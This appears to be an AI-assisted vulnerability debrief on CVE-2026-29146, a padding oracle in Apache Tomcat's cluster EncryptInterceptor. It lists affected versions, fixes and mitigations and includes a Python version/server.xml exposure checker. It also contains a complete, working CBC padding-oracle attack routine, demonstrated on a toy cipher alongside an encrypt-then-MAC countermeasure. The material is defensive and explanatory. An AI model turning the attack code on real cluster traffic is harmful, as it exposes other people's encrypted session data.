PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-29146 Apache CVE debrief

CVE-2026-29146 is a padding oracle vulnerability in Apache Tomcat's EncryptInterceptor, the Tribes cluster channel interceptor that encrypts cluster messages, when it runs with its default configuration. This issue affects Apache Tomcat versions from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, and from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53, or 9.0.116, which fix the issue; no fixed release is listed for the 8.5 and 7.0 branches. The CVSS score for this vulnerability is 7.5 (high severity). The vulnerability was published on April 9, 2026, and last modified on June 30, 2026.

Vendor
Apache
Product
Tomcat
CVSS
HIGH 7.5
CISA KEV
Not listed in stored evidence
Original CVE published
2026-04-09
Original CVE updated
2026-06-30
Advisory published
2026-04-09
Advisory updated
2026-06-30

Who should care

Administrators of Apache Tomcat deployments that use Tribes clustering (for example, session replication) with EncryptInterceptor in the cluster channel should act on this advisory; a standalone Tomcat without a Cluster element in server.xml does not load the interceptor. The vulnerability can be exploited over the network by an attacker who can deliver messages to the cluster channel, and its high severity score reflects that encrypted cluster traffic can be exposed. Security teams and IT professionals responsible for clustered Tomcat installations should prioritize patching.

Technical summary

CVE-2026-29146 is a padding oracle in Apache Tomcat's EncryptInterceptor when it runs with its default configuration, which uses a CBC block cipher mode with PKCS#5 padding (the documented default encryptionAlgorithm is AES/CBC/PKCS5Padding). In a padding oracle, the receiver's behaviour on a malformed message reveals whether the padding of the decrypted data was valid; in general, an attacker who can submit crafted ciphertexts to such a receiver and observe that distinction can decrypt captured messages one byte at a time without knowing the key. The affected versions of Apache Tomcat are from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, and from 7.0.100 through 7.0.109. The vulnerability's CVSS vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N: exploitable over the network with low attack complexity, no privileges and no user interaction. The impact is a loss of confidentiality of the encrypted cluster traffic (which typically carries replicated session data); integrity and availability are not affected.
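The following is an added example, not code from the debrief's corpus or from Tomcat, showing the vulnerability class described above: a CBC/PKCS#5 padding oracle attack that recovers plaintext byte by byte using nothing but the receiver's accept/reject answer, followed by the generic countermeasure for the class (authenticate the ciphertext before decrypting, so tampered messages are all rejected identically). The block cipher is a toy Feistel network standing in for AES so the file runs on the standard library alone; the attack never looks inside the cipher. The key, IV and session-like payload are constructed for the demo, and the encrypt-then-MAC receiver is the textbook mitigation, not a description of how the Tomcat fix is implemented.

```python
"""CBC padding-oracle attack, and the authenticate-first receiver that removes the oracle."""
import hashlib
import hmac

BLOCK = 16
KEY = b"0123456789abcdef"                 # constructed demo key, never a real one
IV = bytes(range(BLOCK))                  # constructed demo IV
MESSAGE = b"JSESSIONID=5F3A;user=alice"   # constructed stand-in for a cluster message

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    """Round function of the toy cipher: keyed SHA-256 truncated to a half block."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in range(4):                    # 4-round Feistel, toy stand-in for AES
        l, r = r, xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:
    """PKCS#5/#7: append n bytes of value n, 1 <= n <= BLOCK."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")   # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    pt, out, prev = pad(pt), b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return iv + out                       # IV travels in front of the ciphertext

def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    out = b"".join(xor(block_decrypt(key, ct[i:i + BLOCK]), ct[i - BLOCK:i])
                   for i in range(BLOCK, len(ct), BLOCK))
    return unpad(out)

def make_oracle(key: bytes):
    """A receiver whose padding failure is observable (error reply, timing, log line)."""
    def oracle(ct: bytes) -> bool:
        try:
            cbc_decrypt(key, ct)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(oracle, ct: bytes) -> bytes:
    """Recover the padded plaintext of ct with at most 256 oracle queries per byte."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)          # block_decrypt(key, cur), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos            # padding value being forced at this step
            crafted = bytearray(BLOCK)    # attacker-controlled "previous block"
            for j in range(pos + 1, BLOCK):
                crafted[j] = inter[j] ^ padv
            for guess in range(256):
                crafted[pos] = guess
                if not oracle(bytes(crafted) + cur):
                    continue
                if pos == BLOCK - 1:      # rule out ...\x02\x02 passing as a valid pad
                    probe = bytearray(crafted)
                    probe[pos - 1] ^= 0x80
                    if not oracle(bytes(probe) + cur):
                        continue
                inter[pos] = guess ^ padv
                break
            else:
                raise RuntimeError("no guess accepted: receiver is not acting as an oracle")
        plaintext += xor(bytes(inter), prev)
    return plaintext

def make_authenticated_oracle(key: bytes, tag: bytes):
    """Encrypt-then-MAC receiver: tampered ciphertext is rejected before any decryption,
    so padding validity is never exposed (generic countermeasure, not Tomcat's fix)."""
    def oracle(ct: bytes) -> bool:
        if not hmac.compare_digest(hmac.new(key, ct, "sha256").digest(), tag):
            return False
        return make_oracle(key)(ct)
    return oracle

def demo():
    ct = cbc_encrypt(KEY, IV, MESSAGE)
    recovered = unpad(padding_oracle_attack(make_oracle(KEY), ct))
    tag = hmac.new(KEY, ct, "sha256").digest()
    try:
        padding_oracle_attack(make_authenticated_oracle(KEY, tag), ct)
        blocked = False
    except RuntimeError:
        blocked = True
    return recovered, blocked

if __name__ == "__main__":
    print(demo())   # (b'JSESSIONID=5F3A;user=alice', True)
```

The attack needs only the ciphertext and a yes/no answer per query, which is why the transport and the cipher do not matter: what matters is that the receiver's response to invalid padding differs from its response to valid padding. With the MAC checked first, every modified message gets the same answer and the byte-by-byte recovery never gets a foothold.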

Defensive priority

Patching Apache Tomcat installations that run EncryptInterceptor should be given high priority. Given the high CVSS score and the network attack vector, defenders should treat this as a high-priority update, above all where the cluster channel is reachable from outside the cluster members' own network segment.

Recommended defensive actions

  • Upgrade Apache Tomcat to version 11.0.19, 10.1.53, or 9.0.116.
  • Installations on the 8.5 and 7.0 branches fall inside the affected ranges but have no fixed release listed; plan a migration to a branch that has one.
  • Confirm whether EncryptInterceptor is configured in server.xml (an Interceptor element inside Cluster/Channel); only those installations load the affected component, and they are the ones to patch first.
  • Until patched, restrict the cluster channel (membership multicast and receiver ports) to the cluster members' network segment as a compensating control.
  • Monitor cluster channel traffic for messages from hosts that are not cluster members and for bursts of rejected or malformed messages, which is what a byte-by-byte oracle attack looks like on the wire.
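The following is an added exposure check, not tooling from the debrief or from Tomcat: it pairs the affected version ranges and fixed releases listed above with a scan of server.xml for EncryptInterceptor, so the two conditions that together make a host exposed (affected version, interceptor loaded) are evaluated in one place. The Interceptor element, className and encryptionAlgorithm attribute are Tomcat Tribes' own, and AES/CBC/PKCS5Padding is the documented default for that attribute; the server.xml text is constructed. The debrief only states that the default configuration is affected and says nothing about other algorithms, so the check flags the interceptor's presence regardless of the configured algorithm and merely reports which one is in effect.

```python
"""Exposure check for CVE-2026-29146: affected Tomcat version AND EncryptInterceptor configured."""
import re
import xml.etree.ElementTree as ET

# branch -> (first affected patch level, last affected patch level, fixed release or None);
# ranges and fixes are the ones the debrief lists
AFFECTED = {
    (11, 0): (0, 18, "11.0.19"),
    (10, 0): (0, None, "10.1.53"),    # 10.0.0-M1 onward: every 10.0.x is inside the range
    (10, 1): (0, 52, "10.1.53"),
    (9, 0): (13, 115, "9.0.116"),
    (8, 5): (38, 100, None),          # no fixed 8.5 release listed
    (7, 0): (100, 109, None),         # no fixed 7.0 release listed
}
DOCUMENTED_DEFAULT_ALGORITHM = "AES/CBC/PKCS5Padding"   # Tomcat's documented default

# constructed server.xml: a clustered Tomcat with the interceptor at its defaults
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster">
        <Channel className="org.apache.catalina.tribes.group.GroupChannel">
          <!-- key value redacted in this constructed sample -->
          <Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
                       encryptionKey="REDACTED"/>
          <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>
        </Channel>
      </Cluster>
      <Host name="localhost" appBase="webapps"/>
    </Engine>
  </Service>
</Server>
"""

def parse_version(v: str) -> tuple:
    """'9.0.110' -> (9, 0, 110); milestone suffixes such as '11.0.0-M1' are accepted."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-M\d+)?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {v!r}")
    return tuple(int(x) for x in m.groups())

def version_status(v: str) -> dict:
    """Is this version inside a listed affected range, and which release fixes it (if any)?"""
    major, minor, patch = parse_version(v)
    lo, hi, fix = AFFECTED.get((major, minor), (None, None, None))
    affected = lo is not None and patch >= lo and (hi is None or patch <= hi)
    return {"version": v, "affected": affected, "fix": fix if affected else None}

def encrypt_interceptors(server_xml: str) -> list:
    """Every <Interceptor> whose className is EncryptInterceptor, with its effective algorithm."""
    found = []
    for el in ET.fromstring(server_xml).iter("Interceptor"):
        cls = el.get("className", "")
        if cls.endswith(".EncryptInterceptor"):
            algo = el.get("encryptionAlgorithm")   # absent means the default applies
            found.append({"className": cls,
                          "algorithm": algo or DOCUMENTED_DEFAULT_ALGORITHM,
                          "default_algorithm": algo is None})
    return found

def assess(version: str, server_xml: str) -> dict:
    """Exposed only when the version is affected and the interceptor is actually configured."""
    status = version_status(version)
    interceptors = encrypt_interceptors(server_xml)
    status["interceptors"] = interceptors
    status["exposed"] = status["affected"] and bool(interceptors)
    if status["affected"] and status["fix"] is None:
        status["note"] = "affected branch with no fixed release listed: plan a branch migration"
    return status

if __name__ == "__main__":
    import json
    print(json.dumps(assess("9.0.110", SAMPLE_SERVER_XML), indent=2))
```

On a real host, feed it the output of `version.sh` (or the version string from catalina.jar's manifest) and the contents of `conf/server.xml`; a non-exposed result still means "patch on the normal schedule", while an exposed one with a fix listed means "patch now" and an exposed one without a fix means the branch itself needs replacing.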

Evidence notes

Stored evidence gives a publication date of April 9, 2026 and a last-modified date of June 30, 2026, a CVSS 3.1 base score of 7.5 (high) and a network attack vector. Fixed releases are recorded for the 11.0, 10.1 and 9.0 branches only; the 8.5 and 7.0 ranges appear in the affected list without a fixed version, and the CVE is not recorded in CISA KEV in the stored evidence. Users are recommended to upgrade to the fixed versions of Apache Tomcat.

Official resources

This article is AI-assisted and based on the supplied source corpus.